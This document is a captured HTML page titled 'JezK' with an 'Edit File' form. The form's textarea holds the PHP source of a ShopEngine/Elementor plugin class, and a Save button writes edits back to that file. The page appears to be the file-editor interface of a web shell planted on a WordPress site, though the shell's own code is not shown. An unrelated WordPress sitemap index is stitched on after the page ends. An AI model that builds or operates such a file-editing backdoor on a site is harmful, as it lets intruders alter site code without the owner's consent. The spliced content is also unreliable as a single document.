
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: elementor-data-map.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

namespace ShopEngine\Utils;

class Elementor_Data_Map {

	private $_el = [];

	public function get_elementor_data($post_id) {

		$dt = get_post_meta($post_id, &#039;_elementor_data&#039;, true);

		return json_decode($dt);
	}

	public function get_widget_data($widget_name, $data = false, $post_id = null) {

		if($data === false &amp;&amp; !empty($post_id)) {

			$data = $this-&gt;get_elementor_data($post_id);
		}

		if(!empty($data) &amp;&amp; is_array($data)) {

			$this-&gt;_el = [];

			$this-&gt;search_el($data, $widget_name);

			return $this-&gt;_el;
		}

		return [];
	}

	private function search_el($data, $name) {

		if(!is_array($data)) {

			return;
		}

		foreach($data as $k =&gt; $v) {

			if(!empty($v-&gt;elements) &amp;&amp; is_array($v-&gt;elements)) {

				$this-&gt;search_el($v-&gt;elements, $name);

			} else {

				if($v-&gt;elType == &#039;widget&#039; &amp;&amp; $v-&gt;widgetType == $name) {

					$this-&gt;_el[] = $v;
				}
			}
		}
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
